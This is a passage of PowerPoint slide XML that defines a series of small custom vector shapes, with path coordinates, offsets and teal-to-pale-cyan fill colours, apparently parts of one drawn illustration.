                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="68"/>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94" name="CustomShape 282"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3627360" y="3720960"/>
            <a:ext cx="153720" cy="47160"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="97" h="30">
                <a:moveTo>
                  <a:pt x="97" y="10"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97" y="1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495" name="CustomShape 283"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3703680" y="3735360"/>
            <a:ext cx="66240" cy="21960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42" h="14">
                <a:moveTo>
                  <a:pt x="42" y="6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="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96" name="CustomShape 284"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3637080" y="3724200"/>
            <a:ext cx="43920" cy="17280"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="28" h="11">
                <a:moveTo>
                  <a:pt x="28" y="5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="5"/>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97" name="CustomShape 285"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3527280" y="3741840"/>
            <a:ext cx="256680" cy="85320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="162" h="54">
                <a:moveTo>
                  <a:pt x="0" y="16"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="138" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99D8D8"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="CustomShape 286"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3784680" y="3732120"/>
            <a:ext cx="91800" cy="41040"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="58" h="26">
                <a:moveTo>
                  <a:pt x="6" y="26"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="58" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="26"/>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499" name="CustomShape 287"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3546360" y="3556080"/>
            <a:ext cx="48960" cy="196560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="31" h="124">
                <a:moveTo>
                  <a:pt x="31" y="3"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="31" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="3"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="7FBFBF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="500" name="CustomShape 288"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3548160" y="3557520"/>
            <a:ext cx="42480" cy="164880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="27" h="104">
                <a:moveTo>
                  <a:pt x="27" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="27" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="99"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="97"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="96"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="93CCCC"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501" name="CustomShape 289"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3549600" y="3559320"/>
            <a:ext cx="34560" cy="132840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="22" h="84">
                <a:moveTo>
                  <a:pt x="22" y="3"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="3"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="A8D8D8"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="502" name="CustomShape 290"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3551400" y="3560760"/>
            <a:ext cx="28080" cy="104400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="18" h="66">
                <a:moveTo>
                  <a:pt x="18" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BCE5E5"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="503" name="CustomShape 291"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3551400" y="3564000"/>
            <a:ext cx="21960" cy="70920"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14" h="45">
                <a:moveTo>
                  <a:pt x="14" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="D1F2F2"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="504" name="CustomShape 292"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3554280" y="3564000"/>
            <a:ext cx="14040" cy="42480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9" h="27">
                <a:moveTo>
                  <a:pt x="9" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E5FFFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="505" name="CustomShape 293"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3728880" y="3686040"/>
            <a:ext cx="21960" cy="21960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14" h="14">
                <a:moveTo>
                  <a:pt x="7" y="14"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="14"/>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506" name="CustomShape 294"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3665520" y="3686040"/>
            <a:ext cx="10800" cy="10800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7" h="7">
                <a:moveTo>
                  <a:pt x="3" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3"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507" name="CustomShape 295"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
